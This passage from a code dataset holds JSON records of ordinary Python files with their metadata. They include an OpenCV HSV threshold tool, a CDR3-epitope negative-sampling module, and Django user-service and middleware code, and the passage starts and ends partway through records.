"call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 56, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 99, "usage_type": "call"}]}
+{"seq_id": "28175497057", "text": "import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('frame')\n\ncv2.createTrackbar('H_lower', 'frame', 0, 180, nothing)\ncv2.createTrackbar('S_lower', 'frame', 0, 255, nothing)\ncv2.createTrackbar('V_lower', 'frame', 0, 255, nothing)\n\ncv2.createTrackbar('H_upper', 'frame', 0, 180, nothing)\ncv2.createTrackbar('S_upper', 'frame', 0, 255, nothing)\ncv2.createTrackbar('V_upper', 'frame', 0, 255, nothing)\n\nwhile (1):\n _, frame = cap.read()\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n hl = cv2.getTrackbarPos('H_lower', 'frame')\n sl = cv2.getTrackbarPos('S_lower', 'frame')\n vl = cv2.getTrackbarPos('V_lower', 'frame')\n\n hu = cv2.getTrackbarPos('H_upper', 'frame')\n su = cv2.getTrackbarPos('S_upper', 'frame')\n vu = cv2.getTrackbarPos('V_upper', 'frame')\n\n lower_bound = np.array([hl, sl, vl])\n upper_bound = np.array([hu, su, vu])\n\n mask = cv2.inRange(hsv, lower_bound, upper_bound)\n res = cv2.bitwise_and(frame, frame, mask = mask)\n\n cv2.imshow('in', frame)\n cv2.imshow('out', res)\n cv2.imshow('mask', mask)\n\n k = cv2.waitKey(5) & 0xFF\n if k == ord('q'):\n cv2.destroyAllWindows()\n break", "repo_name": "sageshoyu/Workshop-6000-2018", "sub_path": "ImageRec/Bound_Finder.py", "file_name": "Bound_Finder.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.getTrackbarPos", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "22678471341", "text": "import gc\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom src.data.control_cdr3_source import ControlCDR3Source\n\n\ndef add_negatives(\n df: pd.DataFrame, full_dataset_path: str, epitope_ratio: bool = False\n):\n \"\"\"Generate negative CDR3-epitope pairs through shuffling and add them to the DataFrame.\n\n Parameters\n ----------\n df : DataFrame\n A DataFrame containing CDR3 and epitope sequence pairs, derived from a relevant Stream object. Should only contain positives, as a \"y\" column with 1s.\n full_dataset_path : str\n Path to the entire cdr3-epitope dataset, before splitting into folds, restricting length or downsampling. Used to avoid generating false negatives during shuffling. Should only contain positive values. Will be merged with current train/val dataframe.\n Length trimming = OK\n CV folds = not OK, in the grouped-kfold setting it does not matter, because when a certain CDR3 is paired with two different epitopes, and they end up in different folds, it's impossible for the CDR3 to be accidentally matched up to the other epitope again, because it's not available for selection. In the normal CV setting it could matter though.\n Downsampling = not OK, a CDR3 could lose representative samples of it being paired with specific epitopes, and could end up being paired with them again as false negatives during shuffling.\n MHC = OK, a few CDR3s occur for both classes, but none of the epitopes do. Consequently it's impossible for a CDR3 to be paired with an epitope that could be a false negative in the full dataset.\n TRAB = OK, none of the CDR3s are identical between TRA and TRB genes. Consequently it's impossible for a CDR3 to be paired with an epitope that could be a false negative in the full dataset.\n epitope_ratio : boolean\n When false, samples an epitope for each CDR3 sequence in the\n proportionally to its occurrence in the other epitope pairs. Does not\n preserve the ratio of positives and negatives within each epitope,\n but does result in every CDR3 sequence having exactly 1 positive and negative.\n When true, samples a set of CDR3 sequences with from the unique list of CDR3s\n for each epitope observation (per epitope), i.e. preserves exact ratio of positives and\n negatives for each epitope, at the expense of some CDR3s appearing more than once\n among the negatives and others only in positives pairs.\n\n Returns\n -------\n DataFrame\n A DataFrame with the original positive CDR3-epitope pairs, and new negative pairs created by shuffling the positive ones.\n \"\"\"\n logger = logging.getLogger(__name__)\n\n logger.info(\n f\"Generating {df.shape[0]} negatives by shuffling the positive sequence pairs.\"\n )\n logger.info(f\"Using {full_dataset_path} to avoid generating false negatives.\")\n\n # print warning and skip generation if there is only 1 epitope\n if len(df[\"antigen.epitope\"].unique()) == 1:\n logger.warning(\n \"Cannot generate negatives through shuffling when there is only 1 epitope present in a fold. Skipping generation...\"\n )\n return df\n\n # read in full dataset and remove duplicates, used to avoid generating false negatives\n full_df = pd.read_csv(\n full_dataset_path, sep=\";\", usecols=[\"cdr3\", \"antigen.epitope\"]\n )\n # merge the train/validation set with the full dataset and use this to check for false negatives\n # merging is important when the validation set is not contained in the full dataset (e.g. 
when using an external test set)\n full_df = (\n pd.concat([full_df, df[[\"cdr3\", \"antigen.epitope\"]]])\n .drop_duplicates()\n .reset_index(drop=True)\n )\n\n # generate negative pairs through shuffling\n if epitope_ratio:\n logger.info(\n \"Negatives will be generated by sampling CDR3 sequences for every observation with a given epitope.\"\n )\n # generate negative pairs by iterating over every sequence pair,\n # and each time match the current epitope with a randomly sampled CDR3\n # sequence from the rest of the dataset (excluding any CDR3s that are paired\n # with the current epitope as a positive example).\n np.random.seed(42)\n shuffled_df = sample_cdr3s_per_epitope(df=df, full_df=full_df)\n\n else:\n logger.info(\n \"Negatives will be generated by sampling a single epitope for each CDR3 sequence.\"\n )\n # generate negative pairs by iterating over every sequence pair,\n # and each time match the current CDR3 with a randomly sampled epitope\n # from the rest of the dataset (excluding any epitopes that are paired\n # with the current CDR3 as a positive example).\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=seed\n # seed=seed + 3458,\n )\n for seed, cdr3 in enumerate(df[\"cdr3\"])\n ]\n\n # convert list of tuples into dataframe and add class label\n shuffled_df = pd.DataFrame(shuffled_pairs, columns=[\"cdr3\", \"antigen.epitope\"],)\n\n # add class label to shuffled observations\n shuffled_df[\"y\"] = 0\n\n # merge with original positive data, ensuring positives are kept at the top of the dataframe\n df = df.append(shuffled_df).reset_index(drop=True)\n\n # extract duplicates\n # NOTE: because the sampling approach ensures that accidental duplicates of\n # positive pairs (i.e. false negatives) never occur, these will all be\n # accidental duplicate samples of negative pairs.\n # Therefore, keep=\"last\" is redundant, but if this was not the case,\n # it would result in only the positive examples being stored in the\n # dataframe (marking the last (=positives) as True).\n # This is kept here for historical purposes, because before the epitope\n # was supplied alongside the cdr3 in a zip operation during sample\n # generation, and the associated positive epitope was used for exclusion\n # purposes.\n # NOTE: technically not required when sampling cdr3s per epitope,\n # because in that case cdr3s are sampled without replacement from\n # a list of unique sequences.\n to_do_df = df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")]\n # make sure all duplicates are indeed all negatives (or there are none)\n assert (\n df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=False), \"y\"]\n .unique()\n .size\n <= 1\n )\n\n # when sampling epitopes per cdr3 (= not epitope_ratio)\n # the following steps are still required\n if not epitope_ratio:\n # remove duplicates from merged dataframe\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"],\n keep=\"first\",\n # This \"keep\" should not be required, see previous NOTE\n # always keeps the original positive examples when duplicates\n # occur across pos/neg, i.e. 
removes false negatives\n ).reset_index(drop=True)\n\n # remove NaN to deal with any possible universal cdr3s\n df = df.dropna(axis=0, how=\"any\", subset=[\"antigen.epitope\"])\n\n # add negatives until required amount is reached\n # add fail safe in case it is mathematically impossible to do so\n n = 0\n while to_do_df.shape[0] > 0 and not epitope_ratio:\n n += 1\n if n > 100:\n logger.warning(\n f\"Could not create negative samples for {len(to_do_df)} CDR3 sequences, likely because they had too many different binding partners. Skipping these...\"\n )\n logger.warning(to_do_df)\n break\n elif n == 50:\n logger.warning(\n f\"Could not create enough negative samples by matching every CDR3 sequence to another epitope exactly once. {len(to_do_df)} CDR3s will be sampled randomly from the positive set, leading them to be re-used and present in multiple negative pairs. Retrying this step 50 times before giving up. The CDR3s to be omitted are {to_do_df.cdr3}.\"\n )\n elif n > 50:\n # it is unlikely, but possible that certain CDR3 sequences will\n # be matched with the same epitope multiple times\n # so the sampling step is repeated 50 times.\n # if there are still duplicates after this, a warning is shown\n # and an equivalent amount of new cdr3s are randomly drawn,\n # and these are then attempted to be matched to\n # new epitopes as negatives.\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=n,\n )\n for cdr3 in df.loc[df[\"y\"] == 1, \"cdr3\"].sample(\n n=len(to_do_df), random_state=42 + n\n )\n ]\n\n else:\n # try to sample another epitope for the duplicate CDR3 sequences\n # i.e. those that were accidentally matched with the same epitope\n # combine the entire dataframe (current positives and negatives)\n # and use this to restrict the list of allowed epitopes\n shuffled_pairs = [\n sample_epitope_per_cdr3(\n cdr3=cdr3,\n df=df,\n full_df=full_df,\n cdr3_column=\"cdr3\",\n epitope_column=\"antigen.epitope\",\n seed=n,\n )\n for cdr3 in to_do_df[\"cdr3\"]\n ]\n shuffled_df = pd.DataFrame(\n shuffled_pairs, columns=[\"cdr3\", \"antigen.epitope\"],\n )\n shuffled_df[\"y\"] = 0\n df = df.append(shuffled_df).reset_index(drop=True)\n to_do_df = df.loc[\n df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")\n ]\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n ).reset_index(drop=True)\n df = df.dropna(axis=0, how=\"any\", subset=[\"antigen.epitope\"])\n\n # assert there are no remaining duplicates and print info\n assert (\n df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"]).sum() == 0\n ), \"Found duplicate sequence pairs after shuffling to generate negatives.\"\n n_pos = np.sum(df[\"y\"] == 1)\n n_neg = np.sum(df[\"y\"] == 0)\n logger.info(\n f\"Generated {n_neg} negative sequence pairs by shuffling the {n_pos} positive pairs.\"\n )\n\n # clean up full dataset from memory\n del full_df\n full_df = \"\"\n del full_df\n gc.collect()\n\n return df\n\n\ndef sample_cdr3s_per_epitope(\n df: pd.DataFrame,\n full_df: pd.DataFrame,\n cdr3_column: str = \"cdr3\",\n epitope_column: str = \"antigen.epitope\",\n):\n \"\"\"\n Generate negative pairs by iterating over every sequence pair in the dataset,\n and each time match the current epitope with a randomly sampled CDR3\n sequence from the rest of the dataset, excluding any CDR3s that are paired\n with the current epitope as a positive example (false negatives).\n\n Preserves exact ratio of 
positives and negatives for each epitope,\n    at the expense of some CDR3s appearing more than once among negatives, and others\n    only in the positive pairs.\n\n    CDR3s are sampled from the unique set of CDR3s, instead of the actual distribution.\n    Should not matter in most cases since only a small minority of CDR3s occur more\n    than once.\n\n    NOTE: when the number of pairs for a given epitope is larger than the number\n    of available unique CDR3 sequences associated with the other epitopes,\n    the number of returned negatives for this epitope will be limited to this\n    smaller number, causing a slight deviation from the desired per-epitope ratio.\n\n    Parameters\n    ----------\n    df : pd.DataFrame\n        A positive cdr3-epitope DataFrame with a \"cdr3\" and \"antigen.epitope\" column.\n        Must have a class label column (\"y\") with \"1\" as the positive label.\n    full_df : pd.DataFrame\n        The entire cdr3-epitope DataFrame, before splitting into folds, restricting length or downsampling.\n        Used to avoid generating false negatives. Should only contain positive values.\n    cdr3_column : str\n        The header for the cdr3 column in the DataFrame.\n    epitope_column : str\n        The header for the epitope column in the DataFrame.\n\n    Returns\n    -------\n    pd.DataFrame\n        A dataframe with negative cdr3 and epitope sequence pairs, of the same size as the input.\n    \"\"\"\n    logger = logging.getLogger(__name__)\n\n    # full_df should only contain positive pairs, and consequently no y column should be present yet\n    assert \"y\" not in full_df.columns\n\n    # create list to store dataframes for every epitope\n    negative_list = []\n\n    # loop through every observation per epitope\n    for epitope in df[epitope_column].unique():\n        # extract number of required observations for current epitope\n        n = df[df[epitope_column] == epitope].shape[0]\n\n        # check which CDR3s occur as a positive partner for the current epitope in the full dataset\n        cdr3_to_exclude = full_df.loc[(full_df[epitope_column] == epitope), cdr3_column]\n        possible_cdr3 = df.loc[\n            ~df[cdr3_column].isin(cdr3_to_exclude), cdr3_column\n        ].unique()\n\n        # check if list is empty => epitope binds to every CDR3 present\n        if possible_cdr3.size == 0:\n            logger = logging.getLogger(__name__)\n            logger.warning(\n                f\"Epitope sequence {epitope} is associated with every CDR3 sequence in the dataset and will be discarded from the negatives.\"\n            )\n            continue\n\n        # When the number of required CDR3 sequences for the given epitope\n        # is larger than the number of available non-epitope sequence pairs\n        # only sample this latter amount.\n        if n > possible_cdr3.size:\n            logger.warning(\n                f\"Epitope sequence {epitope} requires more CDR3 sequences than the number of available unique CDR3 sequences associated with other epitopes in the provided datasets ({possible_cdr3.size}). 
Only this many negatives will be generated for this epitope, instead of the expected {n}.\"\n )\n n = possible_cdr3.size\n\n # sample without replacement to avoid accidental duplicates\n # among the negatives for the given epitope\n sample_df = pd.DataFrame(\n np.random.choice(possible_cdr3, size=n, replace=False),\n columns=[cdr3_column],\n )\n\n sample_df[epitope_column] = epitope\n\n negative_list.append(sample_df)\n\n negative_df = pd.concat(negative_list)\n\n return negative_df\n\n\ndef sample_epitope_per_cdr3(\n cdr3: str,\n df: pd.DataFrame,\n full_df: pd.DataFrame,\n cdr3_column: str = \"cdr3\",\n epitope_column: str = \"antigen.epitope\",\n seed: int = 42,\n) -> (str, str):\n \"\"\"Sample an epitope for the given CDR3 sequence from the pool of other epitopes in the original positive dataset.\n\n Does not preserve the ratio of positives and negatives within each epitope,\n but does result in every CDR3 sequence having exactly 1 positive and negative.\n\n NOTE: do not use a fixed random_state for the sample function, since this will result in the same epitope\n being returned every time (for cdr3s with the same original epitope).\n\n Parameters\n ----------\n cdr3 : str\n The cdr3 sequence that should be matched with a negative epitope.\n df : pd.DataFrame\n A positive cdr3-epitope DataFrame with a \"cdr3\" and \"antigen.epitope\" column.\n Must have a class label column (\"y\") with \"1\" as the positive label.\n full_df : pd.DataFrame\n The entire cdr3-epitope DataFrame, before splitting into folds, restricting length or downsampling.\n Used to avoid generating false negatives. Should only contain positive values.\n cdr3_column : str\n The header for the cdr3 column in the DataFrame.\n epitope_column : str\n The header for the epitope column in the DataFrame.\n seed : int\n Random state to use for sampling. Must be incremented upon multiple uses or the same pair\n will be drawn every time.\n\n Returns\n -------\n Tuple\n A tuple of a negative cdr3 and epitope sequence pair.\n \"\"\"\n logger = logging.getLogger(__name__)\n\n # full_df should only contain positive pairs, and consequently no y column should be present yet\n assert \"y\" not in full_df.columns\n\n # TODO: instead of having to retry matching CDR3s 50 times if they fail to match with a valid epitope\n # add the negative cdr3-epitope pairs to the epitopes_to_exclude list. Then, if the possible_epitopes\n # list is empty, this means that all epitopes in the dataset are either present in a positive example of this cdr3,\n # or a negative one, but either way the set of epitopes is excluded. Then a warning can be printed\n # and this cdr3 can be rejected. 
Afterwards, all rejected (nans) should be counted,\n    # and the same amount of new cdr3s should be drawn again, while printing a warning that certain cdr3s are being\n    # re-used in order to achieve the 50:50 pos-neg balance.\n\n    # check which epitopes occur as a positive partner for the current cdr3 in the full dataset\n    epitopes_to_exclude = full_df.loc[(full_df[cdr3_column] == cdr3), epitope_column]\n    # epitopes_to_exclude = df.loc[\n    #     (df[cdr3_column] == cdr3) & (df[\"y\"] == 1), epitope_column\n    # ]\n    # NOTE: for this to work, the original data source should either remain unmodified (to avoid epitopes paired with\n    # the cdr3 as a negative example from showing up in this list), or by making sure the class labels are 1, in which\n    # case the original dataframe should be given class labels before the sample_epitope_per_cdr3 function is called for the first time.\n\n    # create pd.Series with all epitopes except for those that are positive partners of the current cdr3\n\n    # isin is faster even if there's just a single epitope, so use it by default\n    # %timeit df[\"antigen.epitope\"].isin([\"LGYGFVNYI\"])\n    # 410 µs ± 19.3 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n    # %timeit df[\"antigen.epitope\"] != \"LGYGFVNYI\"\n    # 1.46 ms ± 24.9 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n\n    possible_epitopes = df.loc[\n        ~df[epitope_column].isin(epitopes_to_exclude), epitope_column,\n    ]\n\n    # check if list is empty => cdr3 binds to every epitope present\n    if possible_epitopes.empty:\n        logger.warning(\n            f\"CDR3 sequence {cdr3} is associated with every epitope in the dataset and will be discarded from the negatives.\"\n        )\n        return cdr3, np.NaN\n\n    # sample 1 epitope from this list to pair with the cdr3 as a negative example\n    # sampling should happen uniformly across all epitopes in their original distributions,\n    # because the negatives should have a similar epitope distribution to the positives, i.e.\n    # the list of possible epitopes should not be deduplicated or uniqued.\n    else:\n        sampled_epitope = possible_epitopes.sample(n=1, random_state=seed).iloc[0]\n        return cdr3, sampled_epitope\n\n\ndef augment_negatives(negative_source, df, cdr3_range, amount):\n\n    epitopes = (\n        df.loc[df[\"y\"] == 1, \"antigen.epitope\"]\n        .sample(n=amount, random_state=42)\n        .reset_index(drop=True)\n    )\n\n    negative_source = ControlCDR3Source(\n        filepath=negative_source, min_length=cdr3_range[0], max_length=cdr3_range[1],\n    )\n\n    cdr3 = (\n        negative_source.data[negative_source.headers[\"cdr3_header\"]]\n        .sample(n=amount, random_state=42)\n        .reset_index(drop=True)\n        .rename(\"cdr3\")\n    )\n    negative_df = pd.concat([cdr3, epitopes], axis=1)\n    negative_df[\"y\"] = 0\n\n    df = df.append(negative_df).reset_index(drop=True)\n\n    to_do_df = df.loc[df.duplicated(subset=[\"cdr3\", \"antigen.epitope\"], keep=\"last\")]\n\n    # remove duplicates from merged dataframe\n    df = df.drop_duplicates(\n        subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n    ).reset_index(drop=True)\n\n    amount = to_do_df.shape[0]\n    seed = 42\n    while amount > 0:\n        seed += 1\n        epitopes = (\n            df.loc[df[\"y\"] == 1, \"antigen.epitope\"]\n            .sample(n=amount, random_state=seed)\n            .reset_index(drop=True)\n        )\n        cdr3 = (\n            negative_source.data[negative_source.headers[\"cdr3_header\"]]\n            .sample(n=amount, random_state=seed)\n            .reset_index(drop=True)\n            .rename(\"cdr3\")\n        )\n        negative_df = pd.concat([cdr3, epitopes], axis=1)\n        negative_df[\"y\"] = 0\n        df = df.append(negative_df).reset_index(drop=True)\n        to_do_df = df.loc[\n            df.duplicated(subset=[\"cdr3\", 
\"antigen.epitope\"], keep=\"last\")\n ]\n df = df.drop_duplicates(\n subset=[\"cdr3\", \"antigen.epitope\"], keep=\"first\",\n ).reset_index(drop=True)\n amount = to_do_df.shape[0]\n\n return df\n\n\n# def sample_epitope_per_epitope(\n# df: pd.DataFrame,\n# full_df: pd.DataFrame,\n# cdr3_column: str = \"cdr3\",\n# epitope_column: str = \"antigen.epitope\",\n# ):\n# \"\"\"NOT USED. See second NOTE below.\n# \"\"\"\n# # full_df should only contain positive pairs, and consequently no y column should be present yet\n# assert \"y\" not in full_df.columns\n\n# # create list to store dataframes for every epitope\n# negative_list = []\n\n# # loop through every observation per epitope\n# for epitope in df[epitope_column].unique():\n# # extract number of required observations for current epitope\n# n = df[df[epitope_column] == epitope].shape[0]\n\n# # extract the CDR3 sequences paired with this epitope\n# cdr3_list = df.loc[df[epitope_column] == epitope, cdr3_column]\n\n# # check which other epitopes occur as a positive partner for all the\n# # CDR3 sequences associated with the current epitope in the full dataset\n# # NOTE: this makes the assumption that, given the followning pairs:\n# # cdr3 A - epitope 1\n# # cdr3 B - epitope 1\n# # cdr3 A - epitope 2\n# # that cdr3 B should not be matched with epitope 2, because\n# # one of its partner CDR3s that binds the same epitope (1),\n# # can bind epitope 2 as well.\n# epitopes_to_exclude = full_df.loc[\n# full_df[cdr3_column].isin(cdr3_list), epitope_column\n# ].unique()\n\n# # NOTE: don't deduplicate this list to preserve as much of the epitope distribution as possible\n# possible_epitopes = df.loc[\n# ~df[epitope_column].isin(epitopes_to_exclude), epitope_column\n# ]\n\n# # check if list is empty => epitope binds to every CDR3 present\n# if possible_epitopes.size == 0:\n# logger = logging.getLogger(__name__)\n# logger.warning(\n# f\"No epitopes found that are not bound by at least some CDR3 sequences that also bind the current epitope {epitope}. This epitope and its CDR3 sequences will be discarded from the negatives.\"\n# )\n# continue\n\n# # sample with replacement if n is be larger than the number available non-epitope sequence pairs\n# if n > possible_epitopes.size:\n# logger.warning(\n# f\"CDR3 sequences associated with {epitope} require more negative epitopes than the number of available epitopes in the provided datasets ({possible_epitopes.size}). 
Only this many negatives will be generated for this epitope, instead of the expected {n}.\"\n# )\n# n = possible_epitopes.size\n\n# sample_df = pd.DataFrame(\n# np.random.choice(possible_epitopes, size=n, replace=False),\n# columns=[epitope_column],\n# )\n\n# sample_df[cdr3_column] = cdr3_list\n\n# negative_list.append(sample_df)\n\n# negative_df = pd.concat(negative_list)\n\n# return negative_df\n", "repo_name": "pmoris/ImRex", "sub_path": "src/processing/negative_sampler.py", "file_name": "negative_sampler.py", "file_ext": "py", "file_size_in_byte": 24559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 218, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 233, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 234, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 275, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 296, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 322, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 330, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 405, "usage_type": "attribute"}, {"api_name": "src.data.control_cdr3_source.ControlCDR3Source", "line_number": 424, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 434, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 461, "usage_type": "call"}]}
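The exclusion-based sampling at the heart of negative_sampler.py is easiest to see on a toy frame. This sketch mirrors the core of sample_epitope_per_cdr3 — drop the CDR3's known positive partners, then sample from what remains — on made-up sequences (none of the values below come from the record):

# Toy illustration of exclusion-based negative sampling (sequences are invented).
import pandas as pd

df = pd.DataFrame({
    "cdr3":            ["CASA", "CASB", "CASC", "CASA"],
    "antigen.epitope": ["EP1",  "EP2",  "EP3",  "EP2"],
})

cdr3 = "CASA"
# epitopes already paired with this CDR3 are excluded to avoid false negatives
exclude = df.loc[df["cdr3"] == cdr3, "antigen.epitope"]
candidates = df.loc[~df["antigen.epitope"].isin(exclude), "antigen.epitope"]
negative_epitope = candidates.sample(n=1, random_state=42).iloc[0]
print(cdr3, negative_epitope)  # -> CASA EP3, a pair never seen as a positive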
+{"seq_id": "6673111179", "text": "from users.models import *\nfrom utils.exceptions import UserDoesNotExist\n\nclass UserService():\n\n def register_user(self, user_name, mobile, pincode, role=None):\n if role:\n user = User.objects.get_or_create(name=user_name, mobile_number=mobile, pincode=pincode, role='admin')\n else:\n user = User.objects.get_or_create(name=user_name, mobile_number=mobile, pincode=pincode)\n\n return user[0].id\n\n def record_user_assessment(self, user_id, symptoms, travel_hostory, covid_contact):\n try:\n user = User.objects.get(id=user_id)\n covid_symptom, created = UserSymptom.objects.get_or_create(user_id=user, symptoms=symptoms, travel_hostory=travel_hostory, covid_contact=covid_contact)\n covid_risk = covid_symptom.covid_risk\n return covid_risk\n except User.DoesNotExist as exec:\n raise UserDoesNotExist()\n \n def update_covid_result(self, user_id, admin_id, result):\n try:\n user = User.objects.get(id=user_id)\n admin = User.objects.get(id=admin_id)\n user_covid = CovidResult.objects.filter(user_id=user, admin_id=admin).update(covid_result=result)\n return True\n except User.DoesNotExist as exec:\n raise UserDoesNotExist()", "repo_name": "heyswatisrivastava/covid_tracker", "sub_path": "covid_tracker/users/services/user_services.py", "file_name": "user_services.py", "file_ext": "py", "file_size_in_byte": 1305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.exceptions.UserDoesNotExist", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.exceptions.UserDoesNotExist", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "2605137204", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import redirect\n\n\nclass AuthenticationMiddleware(object):\n\n def process_request(self, request):\n if request.user.is_authenticated():\n if request.path.startswith('/login'):\n return redirect('/')\n elif request.path == '/':\n return redirect('login')\n", "repo_name": "fujimisakari/todo-server", "sub_path": "application/module/middleware.py", "file_name": "middleware.py", "file_ext": "py", "file_size_in_byte": 348, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "13760276678", "text": "import cv2\nimport numpy as np\n\nclass ShapeDetector:\n \n def __init__(self):\n pass\n \n def detect(self,c):\n # init the shape name and approximate the contour\n # Ramer-Douglas Peucker algo will be used \n shape = \"unidentified\"\n peri = cv2.arcLength(c,True)\n approx = cv2.approxPolyDP(c, .02*peri , True)\n\n print(c[1])\n # case for each shape\n\n # if triangle\n if len(approx) == 3:\n shape = \"triangle\"\n # if square or rectangle\n elif len(approx) == 4:\n #use shape factors\n # In order to determine which one we can calculate the ratio of the contours\n #figure out shape factor\n (x ,y ,w ,h) = cv2.boundingRect(approx)\n area = w*h\n areac = cv2.contourArea(approx)\n\n\n #find the greatest distance between all them points\n distance = 0\n for x in range(len(c)):\n currPoint = c[x,0]\n for y in range(len(c)):\n temp_distance = ((currPoint[0] - c[y,0,0])**2 + (currPoint[1] - c[y,0,1])**2) **.5\n if temp_distance > distance:\n distance = temp_distance\n sf = areac/(distance ** 2)\n print(sf)\n if w > h:\n aspRatio = w / float(h)\n else:\n aspRatio = float(h) / w\n\n print(aspRatio)\n if 